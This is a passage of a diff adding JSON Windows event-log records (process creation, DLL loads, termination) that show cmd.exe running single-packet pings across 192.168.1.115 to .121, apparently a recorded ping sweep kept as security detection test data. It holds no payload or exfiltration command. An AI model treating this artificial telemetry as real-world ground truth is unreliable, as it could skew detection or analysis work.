"image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "process", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572541830000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.115", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7872, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572541980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "process", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572546840000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.116", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3980, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572547029984, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572546980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "event_type": "process", + "pid": 3980, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572551990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.117", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7172, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572552140000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "event_type": "process", + "pid": 7172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572556830000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.118", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7788, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572556980000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "event_type": "process", + "pid": 7788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572561990000, + "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.119", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4884, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572562140000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "event_type": "process", + "pid": 4884, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572566830000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.120", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7800, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572566980000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572566990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "event_type": "process", + "pid": 7800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572571990000, + "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.121", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3288, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572572140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" + }, + { + "event_type": "image_load", + 